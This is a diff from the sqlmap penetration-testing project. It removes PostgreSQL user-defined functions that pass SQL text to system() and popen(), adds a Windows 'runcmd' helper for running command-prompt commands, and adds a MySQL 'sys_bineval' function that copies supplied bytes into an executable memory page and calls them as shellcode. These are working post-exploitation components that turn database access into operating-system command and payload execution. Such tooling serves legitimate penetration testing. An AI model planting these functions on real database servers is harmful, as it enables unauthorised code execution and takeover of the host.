-	web: http://bernardodamele.blogspot.com/
-	email: bernardo.damele@gmail.com
-	
-	This library is free software; you can redistribute it and/or
-	modify it under the terms of the GNU Lesser General Public
-	License as published by the Free Software Foundation; either
-	version 2.1 of the License, or (at your option) any later version.
-	
-	This library is distributed in the hope that it will be useful,
-	but WITHOUT ANY WARRANTY; without even the implied warranty of
-	MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU
-	Lesser General Public License for more details.
-	
-	You should have received a copy of the GNU Lesser General Public
-	License along with this library; if not, write to the Free Software
-	Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA  02110-1301  USA
-*/
-
-#if defined(_WIN32) || defined(_WIN64) || defined(__WIN32__) || defined(WIN32)
-#define _USE_32BIT_TIME_T
-#define DLLEXP __declspec(dllexport) 
-#define BUILDING_DLL 1
-#else
-#define DLLEXP
-#endif
-
-#include <postgres.h>
-#include <fmgr.h>
-#include <stdlib.h>
-
-#include <ctype.h>
-
-#ifdef PG_MODULE_MAGIC
-PG_MODULE_MAGIC;
-#endif
-
-PG_FUNCTION_INFO_V1(sys_exec);
-extern DLLIMPORT Datum sys_exec(PG_FUNCTION_ARGS) {
-	text *argv0 = PG_GETARG_TEXT_P(0);
-	int32 argv0_size;
-	int32 result = 0;
-	char *command;
-
-	argv0_size = VARSIZE(argv0) - VARHDRSZ;
-	command = (char *)malloc(argv0_size + 1);
-
-	memcpy(command, VARDATA(argv0), argv0_size);
-	command[argv0_size] = '\0';
-
-	/*
-	Only if you want to log
-	elog(NOTICE, "Command execution: %s", command);
-	*/
-
-	result = system(command);
-	free(command);
-
-	PG_FREE_IF_COPY(argv0, 0);
-	PG_RETURN_INT32(result);
-}
-
-PG_FUNCTION_INFO_V1(sys_eval);
-extern DLLIMPORT Datum sys_eval(PG_FUNCTION_ARGS) {
-	text *argv0 = PG_GETARG_TEXT_P(0);
-	text *result_text;
-	int32 argv0_size;
-	char *command;
-	char *result;
-	FILE *pipe;
-	char line[1024];
-	int32 outlen, linelen;
-
-	argv0_size = VARSIZE(argv0) - VARHDRSZ;
-	command = (char *)malloc(argv0_size + 1);
-
-	memcpy(command, VARDATA(argv0), argv0_size);
-	command[argv0_size] = '\0';
-
-	/*
-	Only if you want to log
-	elog(NOTICE, "Command evaluated: %s", command);
-	*/
-
-	result = (char *)malloc(1);
-	outlen = 0;
-
-	pipe = popen(command, "r");
-
-	while (fgets(line, sizeof(line), pipe) != NULL) {
-		linelen = strlen(line);
-		result = (char *)realloc(result, outlen + linelen);
-		strncpy(result + outlen, line, linelen);
-		outlen = outlen + linelen;
-	}
-
-	pclose(pipe);
-
-	if (*result) {
-		result[outlen-1] = 0x00;
-	}
-
-	result_text = (text *)malloc(VARHDRSZ + strlen(result));
-	VARATT_SIZEP(result_text) = strlen(result) + VARHDRSZ;
-	//SET_VARSIZE(result_text, VARHDRSZ + strlen(result));
-	memcpy(VARDATA(result_text), result, strlen(result));
-
-	PG_RETURN_POINTER(result_text);
-}

extra/postgresqludfsys/lib_postgresqludf_sys/linux/src/8.3/lib_postgresqludf_sys.c

@@ -1,111 +0,0 @@
-/* 
-	lib_postgresqludf_sys - a library with miscellaneous (operating) system level functions
-	Copyright (C) 2009  Bernardo Damele A. G.
-	web: http://bernardodamele.blogspot.com/
-	email: bernardo.damele@gmail.com
-	
-	This library is free software; you can redistribute it and/or
-	modify it under the terms of the GNU Lesser General Public
-	License as published by the Free Software Foundation; either
-	version 2.1 of the License, or (at your option) any later version.
-	
-	This library is distributed in the hope that it will be useful,
-	but WITHOUT ANY WARRANTY; without even the implied warranty of
-	MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU
-	Lesser General Public License for more details.
-	
-	You should have received a copy of the GNU Lesser General Public
-	License along with this library; if not, write to the Free Software
-	Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA  02110-1301  USA
-*/
-
-#if defined(_WIN32) || defined(_WIN64) || defined(__WIN32__) || defined(WIN32)
-#define _USE_32BIT_TIME_T
-#define DLLEXP __declspec(dllexport) 
-#define BUILDING_DLL 1
-#else
-#define DLLEXP
-#endif
-
-#include <postgres.h>
-#include <fmgr.h>
-#include <stdlib.h>
-
-#include <ctype.h>
-
-#ifdef PG_MODULE_MAGIC
-PG_MODULE_MAGIC;
-#endif
-
-PG_FUNCTION_INFO_V1(sys_exec);
-extern PGDLLIMPORT Datum sys_exec(PG_FUNCTION_ARGS) {
-	text *argv0 = PG_GETARG_TEXT_P(0);
-	int32 argv0_size;
-	int32 result = 0;
-	char *command;
-
-	argv0_size = VARSIZE(argv0) - VARHDRSZ;
-	command = (char *)malloc(argv0_size + 1);
-
-	memcpy(command, VARDATA(argv0), argv0_size);
-	command[argv0_size] = '\0';
-
-	/*
-	Only if you want to log
-	elog(NOTICE, "Command execution: %s", command);
-	*/
-
-	result = system(command);
-	free(command);
-
-	PG_FREE_IF_COPY(argv0, 0);
-	PG_RETURN_INT32(result);
-}
-
-PG_FUNCTION_INFO_V1(sys_eval);
-extern PGDLLIMPORT Datum sys_eval(PG_FUNCTION_ARGS) {
-	text *argv0 = PG_GETARG_TEXT_P(0);
-	text *result_text;
-	int32 argv0_size;
-	char *command;
-	char *result;
-	FILE *pipe;
-	char line[1024];
-	int32 outlen, linelen;
-
-	argv0_size = VARSIZE(argv0) - VARHDRSZ;
-	command = (char *)malloc(argv0_size + 1);
-
-	memcpy(command, VARDATA(argv0), argv0_size);
-	command[argv0_size] = '\0';
-
-	/*
-	Only if you want to log
-	elog(NOTICE, "Command evaluated: %s", command);
-	*/
-
-	result = (char *)malloc(1);
-	outlen = 0;
-
-	pipe = popen(command, "r");
-
-	while (fgets(line, sizeof(line), pipe) != NULL) {
-		linelen = strlen(line);
-		result = (char *)realloc(result, outlen + linelen);
-		strncpy(result + outlen, line, linelen);
-		outlen = outlen + linelen;
-	}
-
-	pclose(pipe);
-
-	if (*result) {
-		result[outlen-1] = 0x00;
-	}
-
-	result_text = (text *)malloc(VARHDRSZ + strlen(result));
-	//VARATT_SIZEP(result_text) = strlen(result) + VARHDRSZ;
-	SET_VARSIZE(result_text, VARHDRSZ + strlen(result));
-	memcpy(VARDATA(result_text), result, strlen(result));
-
-	PG_RETURN_POINTER(result_text);
-}

extra/postgresqludfsys/lib_postgresqludf_sys/windows/src/8.2/lib_postgresqludf_sys.c

@@ -1,111 +0,0 @@
-/* 
-	lib_postgresqludf_sys - a library with miscellaneous (operating) system level functions
-	Copyright (C) 2009  Bernardo Damele A. G.
-	web: http://bernardodamele.blogspot.com/
-	email: bernardo.damele@gmail.com
-	
-	This library is free software; you can redistribute it and/or
-	modify it under the terms of the GNU Lesser General Public
-	License as published by the Free Software Foundation; either
-	version 2.1 of the License, or (at your option) any later version.
-	
-	This library is distributed in the hope that it will be useful,
-	but WITHOUT ANY WARRANTY; without even the implied warranty of
-	MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU
-	Lesser General Public License for more details.
-	
-	You should have received a copy of the GNU Lesser General Public
-	License along with this library; if not, write to the Free Software
-	Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA  02110-1301  USA
-*/
-
-#if defined(_WIN32) || defined(_WIN64) || defined(__WIN32__) || defined(WIN32)
-#define _USE_32BIT_TIME_T
-#define DLLEXP __declspec(dllexport) 
-#define BUILDING_DLL 1
-#else
-#define DLLEXP
-#endif
-
-#include <postgres.h>
-#include <fmgr.h>
-#include <stdlib.h>
-
-#include <ctype.h>
-
-#ifdef PG_MODULE_MAGIC
-PG_MODULE_MAGIC;
-#endif
-
-PG_FUNCTION_INFO_V1(sys_exec);
-extern DLLIMPORT Datum sys_exec(PG_FUNCTION_ARGS) {
-	text *argv0 = PG_GETARG_TEXT_P(0);
-	int32 argv0_size;
-	int32 result = 0;
-	char *command;
-
-	argv0_size = VARSIZE(argv0) - VARHDRSZ;
-	command = (char *)malloc(argv0_size + 1);
-
-	memcpy(command, VARDATA(argv0), argv0_size);
-	command[argv0_size] = '\0';
-
-	/*
-	Only if you want to log
-	elog(NOTICE, "Command execution: %s", command);
-	*/
-
-	result = system(command);
-	free(command);
-
-	PG_FREE_IF_COPY(argv0, 0);
-	PG_RETURN_INT32(result);
-}
-
-PG_FUNCTION_INFO_V1(sys_eval);
-extern DLLIMPORT Datum sys_eval(PG_FUNCTION_ARGS) {
-	text *argv0 = PG_GETARG_TEXT_P(0);
-	text *result_text;
-	int32 argv0_size;
-	char *command;
-	char *result;
-	FILE *pipe;
-	char line[1024];
-	int32 outlen, linelen;
-
-	argv0_size = VARSIZE(argv0) - VARHDRSZ;
-	command = (char *)malloc(argv0_size + 1);
-
-	memcpy(command, VARDATA(argv0), argv0_size);
-	command[argv0_size] = '\0';
-
-	/*
-	Only if you want to log
-	elog(NOTICE, "Command evaluated: %s", command);
-	*/
-
-	result = (char *)malloc(1);
-	outlen = 0;
-
-	pipe = popen(command, "r");
-
-	while (fgets(line, sizeof(line), pipe) != NULL) {
-		linelen = strlen(line);
-		result = (char *)realloc(result, outlen + linelen);
-		strncpy(result + outlen, line, linelen);
-		outlen = outlen + linelen;
-	}
-
-	pclose(pipe);
-
-	if (*result) {
-		result[outlen-1] = 0x00;
-	}
-
-	result_text = (text *)malloc(VARHDRSZ + strlen(result));
-	VARATT_SIZEP(result_text) = strlen(result) + VARHDRSZ;
-	//SET_VARSIZE(result_text, VARHDRSZ + strlen(result));
-	memcpy(VARDATA(result_text), result, strlen(result));
-
-	PG_RETURN_POINTER(result_text);
-}

extra/postgresqludfsys/lib_postgresqludf_sys/windows/src/8.3/lib_postgresqludf_sys.c

@@ -1,111 +0,0 @@
-/* 
-	lib_postgresqludf_sys - a library with miscellaneous (operating) system level functions
-	Copyright (C) 2009  Bernardo Damele A. G.
-	web: http://bernardodamele.blogspot.com/
-	email: bernardo.damele@gmail.com
-	
-	This library is free software; you can redistribute it and/or
-	modify it under the terms of the GNU Lesser General Public
-	License as published by the Free Software Foundation; either
-	version 2.1 of the License, or (at your option) any later version.
-	
-	This library is distributed in the hope that it will be useful,
-	but WITHOUT ANY WARRANTY; without even the implied warranty of
-	MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU
-	Lesser General Public License for more details.
-	
-	You should have received a copy of the GNU Lesser General Public
-	License along with this library; if not, write to the Free Software
-	Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA  02110-1301  USA
-*/
-
-#if defined(_WIN32) || defined(_WIN64) || defined(__WIN32__) || defined(WIN32)
-#define _USE_32BIT_TIME_T
-#define DLLEXP __declspec(dllexport) 
-#define BUILDING_DLL 1
-#else
-#define DLLEXP
-#endif
-
-#include <postgres.h>
-#include <fmgr.h>
-#include <stdlib.h>
-
-#include <ctype.h>
-
-#ifdef PG_MODULE_MAGIC
-PG_MODULE_MAGIC;
-#endif
-
-PG_FUNCTION_INFO_V1(sys_exec);
-extern PGDLLIMPORT Datum sys_exec(PG_FUNCTION_ARGS) {
-	text *argv0 = PG_GETARG_TEXT_P(0);
-	int32 argv0_size;
-	int32 result = 0;
-	char *command;
-
-	argv0_size = VARSIZE(argv0) - VARHDRSZ;
-	command = (char *)malloc(argv0_size + 1);
-
-	memcpy(command, VARDATA(argv0), argv0_size);
-	command[argv0_size] = '\0';
-
-	/*
-	Only if you want to log
-	elog(NOTICE, "Command execution: %s", command);
-	*/
-
-	result = system(command);
-	free(command);
-
-	PG_FREE_IF_COPY(argv0, 0);
-	PG_RETURN_INT32(result);
-}
-
-PG_FUNCTION_INFO_V1(sys_eval);
-extern PGDLLIMPORT Datum sys_eval(PG_FUNCTION_ARGS) {
-	text *argv0 = PG_GETARG_TEXT_P(0);
-	text *result_text;
-	int32 argv0_size;
-	char *command;
-	char *result;
-	FILE *pipe;
-	char line[1024];
-	int32 outlen, linelen;
-
-	argv0_size = VARSIZE(argv0) - VARHDRSZ;
-	command = (char *)malloc(argv0_size + 1);
-
-	memcpy(command, VARDATA(argv0), argv0_size);
-	command[argv0_size] = '\0';
-
-	/*
-	Only if you want to log
-	elog(NOTICE, "Command evaluated: %s", command);
-	*/
-
-	result = (char *)malloc(1);
-	outlen = 0;
-
-	pipe = popen(command, "r");
-
-	while (fgets(line, sizeof(line), pipe) != NULL) {
-		linelen = strlen(line);
-		result = (char *)realloc(result, outlen + linelen);
-		strncpy(result + outlen, line, linelen);
-		outlen = outlen + linelen;
-	}
-
-	pclose(pipe);
-
-	if (*result) {
-		result[outlen-1] = 0x00;
-	}
-
-	result_text = (text *)malloc(VARHDRSZ + strlen(result));
-	//VARATT_SIZEP(result_text) = strlen(result) + VARHDRSZ;
-	SET_VARSIZE(result_text, VARHDRSZ + strlen(result));
-	memcpy(VARDATA(result_text), result, strlen(result));
-
-	PG_RETURN_POINTER(result_text);
-}

extra/runcmd/README.txt

@@ -0,0 +1,7 @@
+Files in this folder can be used to compile auxiliary program that can
+be used for running command prompt commands skipping standard "cmd /c" way. 
+They are licensed under the terms of the GNU Lesser General Public License 
+and it's compiled version is available on the official sqlmap subversion
+repository[1].
+
+[1] https://svn.sqlmap.org/sqlmap/trunk/sqlmap/shell/runcmd.exe_

extra/runcmd/windows/README.txt

@@ -0,0 +1,4 @@
+Compile only the Release version because the Runtime library option
+(Project Properties -> Configuration Properties -> C/C++ -> Code
+Generation) is set to "Multi-threaded (/MT)", which statically links
+everything into executable and doesn't compile Debug version at all.

extra/runcmd/windows/runcmd.sln

@@ -0,0 +1,20 @@
+
+Microsoft Visual Studio Solution File, Format Version 9.00
+# Visual Studio 2005
+Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "runcmd", "runcmd\runcmd.vcproj", "{1C6185A9-871A-4F6E-9B2D-BE4399479784}"
+EndProject
+Global
+	GlobalSection(SolutionConfigurationPlatforms) = preSolution
+		Debug|Win32 = Debug|Win32
+		Release|Win32 = Release|Win32
+	EndGlobalSection
+	GlobalSection(ProjectConfigurationPlatforms) = postSolution
+		{1C6185A9-871A-4F6E-9B2D-BE4399479784}.Debug|Win32.ActiveCfg = Debug|Win32
+		{1C6185A9-871A-4F6E-9B2D-BE4399479784}.Debug|Win32.Build.0 = Debug|Win32
+		{1C6185A9-871A-4F6E-9B2D-BE4399479784}.Release|Win32.ActiveCfg = Release|Win32
+		{1C6185A9-871A-4F6E-9B2D-BE4399479784}.Release|Win32.Build.0 = Release|Win32
+	EndGlobalSection
+	GlobalSection(SolutionProperties) = preSolution
+		HideSolutionNode = FALSE
+	EndGlobalSection
+EndGlobal

extra/runcmd/windows/runcmd/runcmd.cpp

@@ -1,8 +1,7 @@
 /* 
-	lib_postgresqludf_sys - a library with miscellaneous (operating) system level functions
-	Copyright (C) 2009  Bernardo Damele A. G.
-	web: http://bernardodamele.blogspot.com/
-	email: bernardo.damele@gmail.com
+	runcmd - a program for running command prompt commands
+	Copyright (C) 2010 Miroslav Stampar
+	email: miroslav.stampar@gmail.com
 	
 	This library is free software; you can redistribute it and/or
 	modify it under the terms of the GNU Lesser General Public
@@ -19,5 +18,29 @@
 	Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA  02110-1301  USA
 */
 
-CREATE OR REPLACE FUNCTION sys_exec(text) RETURNS int4 AS 'lib_postgresqludf_sys.dll', 'sys_exec' LANGUAGE C RETURNS NULL ON NULL INPUT IMMUTABLE;
-CREATE OR REPLACE FUNCTION sys_eval(text) RETURNS text AS 'lib_postgresqludf_sys.dll', 'sys_eval' LANGUAGE C RETURNS NULL ON NULL INPUT IMMUTABLE;
+#include <stdio.h>
+#include <windows.h>
+#include <use_ansi.h>
+#include "stdafx.h"
+#include <string>
+
+using namespace std;
+int main(int argc, char* argv[])
+{
+  FILE *fp;
+  string cmd;
+
+  for( int count = 1; count < argc; count++ )
+	cmd += " " + string(argv[count]);
+
+  fp = _popen(cmd.c_str(), "r");
+
+  if (fp != NULL) {
+    char buffer[BUFSIZ];
+
+    while (fgets(buffer, sizeof buffer, fp) != NULL)
+      fputs(buffer, stdout);
+  }
+
+  return 0;
+}

extra/runcmd/windows/runcmd/runcmd.vcproj

@@ -0,0 +1,225 @@
+<?xml version="1.0" encoding="windows-1250"?>
+<VisualStudioProject
+	ProjectType="Visual C++"
+	Version="8,00"
+	Name="runcmd"
+	ProjectGUID="{1C6185A9-871A-4F6E-9B2D-BE4399479784}"
+	RootNamespace="runcmd"
+	Keyword="Win32Proj"
+	>
+	<Platforms>
+		<Platform
+			Name="Win32"
+		/>
+	</Platforms>
+	<ToolFiles>
+	</ToolFiles>
+	<Configurations>
+		<Configuration
+			Name="Debug|Win32"
+			OutputDirectory="$(SolutionDir)$(ConfigurationName)"
+			IntermediateDirectory="$(ConfigurationName)"
+			ConfigurationType="1"
+			CharacterSet="1"
+			>
+			<Tool
+				Name="VCPreBuildEventTool"
+			/>
+			<Tool
+				Name="VCCustomBuildTool"
+			/>
+			<Tool
+				Name="VCXMLDataGeneratorTool"
+			/>
+			<Tool
+				Name="VCWebServiceProxyGeneratorTool"
+			/>
+			<Tool
+				Name="VCMIDLTool"
+			/>
+			<Tool
+				Name="VCCLCompilerTool"
+				Optimization="0"
+				PreprocessorDefinitions="WIN32;_DEBUG;_CONSOLE"
+				MinimalRebuild="true"
+				BasicRuntimeChecks="3"
+				RuntimeLibrary="0"
+				UsePrecompiledHeader="2"
+				WarningLevel="3"
+				Detect64BitPortabilityProblems="true"
+				DebugInformationFormat="4"
+			/>
+			<Tool
+				Name="VCManagedResourceCompilerTool"
+			/>
+			<Tool
+				Name="VCResourceCompilerTool"
+			/>
+			<Tool
+				Name="VCPreLinkEventTool"
+			/>
+			<Tool
+				Name="VCLinkerTool"
+				LinkIncremental="2"
+				GenerateDebugInformation="true"
+				SubSystem="1"
+				TargetMachine="1"
+			/>
+			<Tool
+				Name="VCALinkTool"
+			/>
+			<Tool
+				Name="VCManifestTool"
+			/>
+			<Tool
+				Name="VCXDCMakeTool"
+			/>
+			<Tool
+				Name="VCBscMakeTool"
+			/>
+			<Tool
+				Name="VCFxCopTool"
+			/>
+			<Tool
+				Name="VCAppVerifierTool"
+			/>
+			<Tool
+				Name="VCWebDeploymentTool"
+			/>
+			<Tool
+				Name="VCPostBuildEventTool"
+			/>
+		</Configuration>
+		<Configuration
+			Name="Release|Win32"
+			OutputDirectory="$(SolutionDir)$(ConfigurationName)"
+			IntermediateDirectory="$(ConfigurationName)"
+			ConfigurationType="1"
+			CharacterSet="1"
+			WholeProgramOptimization="1"
+			>
+			<Tool
+				Name="VCPreBuildEventTool"
+			/>
+			<Tool
+				Name="VCCustomBuildTool"
+			/>
+			<Tool
+				Name="VCXMLDataGeneratorTool"
+			/>
+			<Tool
+				Name="VCWebServiceProxyGeneratorTool"
+			/>
+			<Tool
+				Name="VCMIDLTool"
+			/>
+			<Tool
+				Name="VCCLCompilerTool"
+				PreprocessorDefinitions="WIN32;NDEBUG;_CONSOLE"
+				RuntimeLibrary="0"
+				UsePrecompiledHeader="2"
+				WarningLevel="3"
+				Detect64BitPortabilityProblems="true"
+				DebugInformationFormat="3"
+			/>
+			<Tool
+				Name="VCManagedResourceCompilerTool"
+			/>
+			<Tool
+				Name="VCResourceCompilerTool"
+			/>
+			<Tool
+				Name="VCPreLinkEventTool"
+			/>
+			<Tool
+				Name="VCLinkerTool"
+				LinkIncremental="1"
+				GenerateDebugInformation="true"
+				SubSystem="1"
+				OptimizeReferences="2"
+				EnableCOMDATFolding="2"
+				TargetMachine="1"
+			/>
+			<Tool
+				Name="VCALinkTool"
+			/>
+			<Tool
+				Name="VCManifestTool"
+			/>
+			<Tool
+				Name="VCXDCMakeTool"
+			/>
+			<Tool
+				Name="VCBscMakeTool"
+			/>
+			<Tool
+				Name="VCFxCopTool"
+			/>
+			<Tool
+				Name="VCAppVerifierTool"
+			/>
+			<Tool
+				Name="VCWebDeploymentTool"
+			/>
+			<Tool
+				Name="VCPostBuildEventTool"
+			/>
+		</Configuration>
+	</Configurations>
+	<References>
+	</References>
+	<Files>
+		<Filter
+			Name="Source Files"
+			Filter="cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx"
+			UniqueIdentifier="{4FC737F1-C7A5-4376-A066-2A32D752A2FF}"
+			>
+			<File
+				RelativePath=".\runcmd.cpp"
+				>
+			</File>
+			<File
+				RelativePath=".\stdafx.cpp"
+				>
+				<FileConfiguration
+					Name="Debug|Win32"
+					>
+					<Tool
+						Name="VCCLCompilerTool"
+						UsePrecompiledHeader="1"
+					/>
+				</FileConfiguration>
+				<FileConfiguration
+					Name="Release|Win32"
+					>
+					<Tool
+						Name="VCCLCompilerTool"
+						UsePrecompiledHeader="1"
+					/>
+				</FileConfiguration>
+			</File>
+		</Filter>
+		<Filter
+			Name="Header Files"
+			Filter="h;hpp;hxx;hm;inl;inc;xsd"
+			UniqueIdentifier="{93995380-89BD-4b04-88EB-625FBE52EBFB}"
+			>
+			<File
+				RelativePath=".\stdafx.h"
+				>
+			</File>
+		</Filter>
+		<Filter
+			Name="Resource Files"
+			Filter="rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav"
+			UniqueIdentifier="{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}"
+			>
+		</Filter>
+		<File
+			RelativePath=".\ReadMe.txt"
+			>
+		</File>
+	</Files>
+	<Globals>
+	</Globals>
+</VisualStudioProject>

extra/runcmd/windows/runcmd/stdafx.cpp

@@ -0,0 +1,8 @@
+// stdafx.cpp : source file that includes just the standard includes
+// runcmd.pch will be the pre-compiled header
+// stdafx.obj will contain the pre-compiled type information
+
+#include "stdafx.h"
+
+// TODO: reference any additional headers you need in STDAFX.H
+// and not in this file

extra/runcmd/windows/runcmd/stdafx.h

@@ -0,0 +1,17 @@
+// stdafx.h : include file for standard system include files,
+// or project specific include files that are used frequently, but
+// are changed infrequently
+//
+
+#pragma once
+
+#ifndef _WIN32_WINNT		// Allow use of features specific to Windows XP or later.                   
+#define _WIN32_WINNT 0x0501	// Change this to the appropriate value to target other versions of Windows.
+#endif						
+
+#include <stdio.h>
+#include <tchar.h>
+
+
+
+// TODO: reference additional headers your program requires here

extra/udfhack/README.txt

@@ -0,0 +1,7 @@
+Files in this folder can be used to compile shared objects that define
+some user-defined functions for MySQL and PostgreSQL. They are licensed
+under the terms of the GNU Lesser General Public License and their
+compiled versions are available on the official sqlmap subversion
+repository[1].
+
+[1] https://svn.sqlmap.org/sqlmap/trunk/sqlmap/udf/

extra/udfhack/linux/README.txt

@@ -0,0 +1,22 @@
+Before compiling, you need to adapt the following to your environment:
+
+Variables in install.sh script:
+--------------------------------------------------------------------------
+Variable name			Variable description
+--------------------------------------------------------------------------
+USER                    Database management system administrative username
+PORT                    Database management system port
+VERSION                 Database management system version (PostgreSQL only)
+
+Variable in Makefile (MySQL only):
+--------------------------------------------------------------------------
+Variable name			Variable description
+--------------------------------------------------------------------------
+LIBDIR                  Database management system absolute file system
+                        path for third party libraries
+
+Then you can launch './install.sh' if you want to compile the shared
+object from the source code and create the user-defined functions on the
+database management system.
+If you only want to compile the shared object, you need to call only the
+'make' command.

extra/udfhack/linux/lib_mysqludf_sys/Makefile

@@ -0,0 +1,9 @@
+# For MySQL < 5.1
+LIBDIR=/usr/lib
+# For MySQL >= 5.1
+#LIBDIR=/usr/lib/mysql/plugin
+
+install:
+	gcc -Wall -I/usr/include/mysql -Os -shared lib_mysqludf_sys.c -o lib_mysqludf_sys.so
+	strip -sx lib_mysqludf_sys.so
+	cp -f lib_mysqludf_sys.so $(LIBDIR)/lib_mysqludf_sys.so

extra/udfhack/linux/lib_mysqludf_sys/install.sh

@@ -1,7 +1,7 @@
 #!/bin/bash
 # lib_mysqludf_sys - a library with miscellaneous (operating) system level functions
 # Copyright (C) 2007  Roland Bouman 
-# Copyright (C) 2008-2009  Roland Bouman and Bernardo Damele A. G.
+# Copyright (C) 2008-2010  Roland Bouman and Bernardo Damele A. G.
 # web: http://www.mysqludf.org/
 # email: mysqludfs@gmail.com, bernardo.damele@gmail.com
 # 
@@ -20,8 +20,8 @@
 # Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA  02110-1301  USA
 
 # Adapt the following settings to your environment
-PORT="3306"
 USER="root"
+PORT="3306"
 
 echo "Compiling the MySQL UDF"
 make
@@ -29,7 +29,7 @@ make
 if test $? -ne 0; then
 	echo "ERROR: You need libmysqlclient development software installed"
 	echo "to be able to compile this UDF, on Debian/Ubuntu just run:"
-	echo "apt-get install libmysqlclient15-dev"
+	echo "apt-get install libmysqlclient-dev"
 	exit 1
 else
 	echo "MySQL UDF compiled successfully"

extra/udfhack/linux/lib_mysqludf_sys/lib_mysqludf_sys.c

@@ -1,7 +1,7 @@
 /* 
 	lib_mysqludf_sys - a library with miscellaneous (operating) system level functions
 	Copyright (C) 2007  Roland Bouman 
-	Copyright (C) 2008-2009  Roland Bouman and Bernardo Damele A. G.
+	Copyright (C) 2008-2010  Roland Bouman and Bernardo Damele A. G.
 	web: http://www.mysqludf.org/
 	email: mysqludfs@gmail.com, bernardo.damele@gmail.com
 	
@@ -23,6 +23,9 @@
 #define DLLEXP __declspec(dllexport) 
 #else
 #define DLLEXP
+#include <sys/types.h>
+#include <sys/wait.h>
+#include <unistd.h>
 #endif
 
 #ifdef STANDARD
@@ -191,6 +194,33 @@ char* sys_eval(
 ,	char *error
 );
 
+/**
+ * sys_bineval
+ * 
+ * executes bynary opcodes.
+ * Beware that this can be a security hazard.
+ */
+DLLEXP 
+my_bool sys_bineval_init(
+	UDF_INIT *initid
+,	UDF_ARGS *args
+);
+
+DLLEXP 
+void sys_bineval_deinit(
+	UDF_INIT *initid
+);
+
+DLLEXP 
+int sys_bineval(
+	UDF_INIT *initid
+,	UDF_ARGS *args
+);
+
+#if defined(_WIN32) || defined(_WIN64) || defined(__WIN32__) || defined(WIN32)
+DWORD WINAPI exec_payload(LPVOID lpParameter);
+#endif
+
 
 #ifdef	__cplusplus
 }
@@ -216,10 +246,12 @@ my_bool lib_mysqludf_sys_info_init(
 	}
 	return status;
 }
+
 void lib_mysqludf_sys_info_deinit(
 	UDF_INIT *initid
 ){
 }
+
 char* lib_mysqludf_sys_info(
 	UDF_INIT *initid
 ,	UDF_ARGS *args
@@ -250,10 +282,12 @@ my_bool sys_get_init(
 		return 1;
 	}
 }
+
 void sys_get_deinit(
 	UDF_INIT *initid
 ){
 }
+
 char* sys_get(
 	UDF_INIT *initid
 ,	UDF_ARGS *args
@@ -305,6 +339,7 @@ my_bool sys_set_init(
 	}	
 	return 0;
 }
+
 void sys_set_deinit(
 	UDF_INIT *initid
 ){
@@ -312,6 +347,7 @@ void sys_set_deinit(
 		free(initid->ptr);
 	}
 }
+
 long long sys_set(
 	UDF_INIT *initid
 ,	UDF_ARGS *args
@@ -352,10 +388,12 @@ my_bool sys_exec_init(
 		return 1;
 	}
 }
+
 void sys_exec_deinit(
 	UDF_INIT *initid
 ){
 }
+
 my_ulonglong sys_exec(
 	UDF_INIT *initid
 ,	UDF_ARGS *args
@@ -382,10 +420,12 @@ my_bool sys_eval_init(
 		return 1;
 	}
 }
+
 void sys_eval_deinit(
 	UDF_INIT *initid
 ){
 }
+
 char* sys_eval(
 	UDF_INIT *initid
 ,	UDF_ARGS *args
@@ -422,5 +462,90 @@ char* sys_eval(
 	return result;
 }
 
+my_bool sys_bineval_init(
+	UDF_INIT *initid
+,	UDF_ARGS *args
+){
+	return 0;
+}
+
+void sys_bineval_deinit(
+	UDF_INIT *initid
+){
+	
+}
+
+int sys_bineval(
+	UDF_INIT *initid
+,	UDF_ARGS *args
+){
+	int32 argv0_size;
+	size_t len;
+
+#if defined(_WIN32) || defined(_WIN64) || defined(__WIN32__) || defined(WIN32)
+	int pID;
+	char *code;
+#else
+	int *addr;
+	size_t page_size;
+	pid_t pID;
+#endif
+
+	argv0_size = strlen(args->args[0]);
+	len = (size_t)argv0_size;
+
+#if defined(_WIN32) || defined(_WIN64) || defined(__WIN32__) || defined(WIN32)
+	// allocate a +rwx memory page
+	code = (char *) VirtualAlloc(NULL, len+1, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
+	strncpy(code, args->args[0], len);
+
+	WaitForSingleObject(CreateThread(NULL, 0, exec_payload, code, 0, &pID), INFINITE);
+#else
+	pID = fork();
+	if(pID<0)
+		return 1;
+
+	if(pID==0)
+	{
+		page_size = (size_t)sysconf(_SC_PAGESIZE)-1;	// get page size
+		page_size = (len+page_size) & ~(page_size);		// align to page boundary
+
+		// mmap an rwx memory page
+		addr = mmap(0, page_size, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_SHARED|MAP_ANONYMOUS, 0, 0);
+
+		if (addr == MAP_FAILED)
+			return 1;
+
+		strncpy((char *)addr, args->args[0], len);
+
+		((void (*)(void))addr)();
+	}
+
+	if(pID>0)
+		waitpid(pID, 0, WNOHANG);
+#endif
+
+	return 0;
+}
+
+#if defined(_WIN32) || defined(_WIN64) || defined(__WIN32__) || defined(WIN32)
+DWORD WINAPI exec_payload(LPVOID lpParameter)
+{
+	__try
+	{
+		__asm
+		{
+			mov eax, [lpParameter]
+			call eax
+		}
+	}
+	__except(EXCEPTION_EXECUTE_HANDLER)
+	{
+
+	}
+
+	return 0;
+}
+#endif
 
 #endif /* HAVE_DLOPEN */

extra/udfhack/linux/lib_mysqludf_sys/lib_mysqludf_sys.sql

@@ -1,7 +1,7 @@
 /*
         lib_mysqludf_sys - a library with miscellaneous (operating) system level functions
         Copyright (C) 2007  Roland Bouman
-        Copyright (C) 2008-2009  Roland Bouman and Bernardo Damele A. G.
+        Copyright (C) 2008-2010  Roland Bouman and Bernardo Damele A. G.
         web: http://www.mysqludf.org/
